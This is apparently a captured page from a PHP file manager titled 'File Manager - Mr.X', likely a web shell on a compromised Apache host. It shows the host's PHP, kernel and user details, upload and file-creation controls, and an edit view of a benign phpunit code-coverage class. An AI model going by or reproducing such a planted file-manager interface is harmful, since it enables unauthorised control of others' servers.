🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:ProcessedPathCoverageData.php
<?php declare(strict_types=1); /* * This file is part of phpunit/php-code-coverage. * * (c) Sebastian Bergmann <sebastian@phpunit.de> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace SebastianBergmann\CodeCoverage\Data; use function array_merge; use function array_unique; use NoDiscard; use SebastianBergmann\CodeCoverage\Driver\XdebugDriver; /** * @internal This class is not covered by the backward compatibility promise for phpunit/php-code-coverage * * @phpstan-import-type TestIdType from ProcessedCodeCoverageData * @phpstan-import-type XdebugPathCoverageType from XdebugDriver */ final class ProcessedPathCoverageData { /** @var array<int, int> */ public readonly array $path; /** @var list<TestIdType> */ public array $hit; /** * @param XdebugPathCoverageType $xdebugCoverageData */ public static function fromXdebugCoverage(array $xdebugCoverageData): self { return new self( $xdebugCoverageData['path'], [], ); } /** * @param array<int, int> $path * @param list<TestIdType> $hit */ public function __construct( array $path, array $hit, ) { $this->hit = $hit; $this->path = $path; } #[NoDiscard] public function merge(self $data): self { if ($data->hit === []) { return $this; } return new self( $this->path, array_unique(array_merge($this->hit, $data->hit)), ); } /** * @param TestIdType $testCaseId */ public function recordHit(string $testCaseId): void { $this->hit[] = $testCaseId; } }
Save Changes
Cancel
Create New File
Create New Folder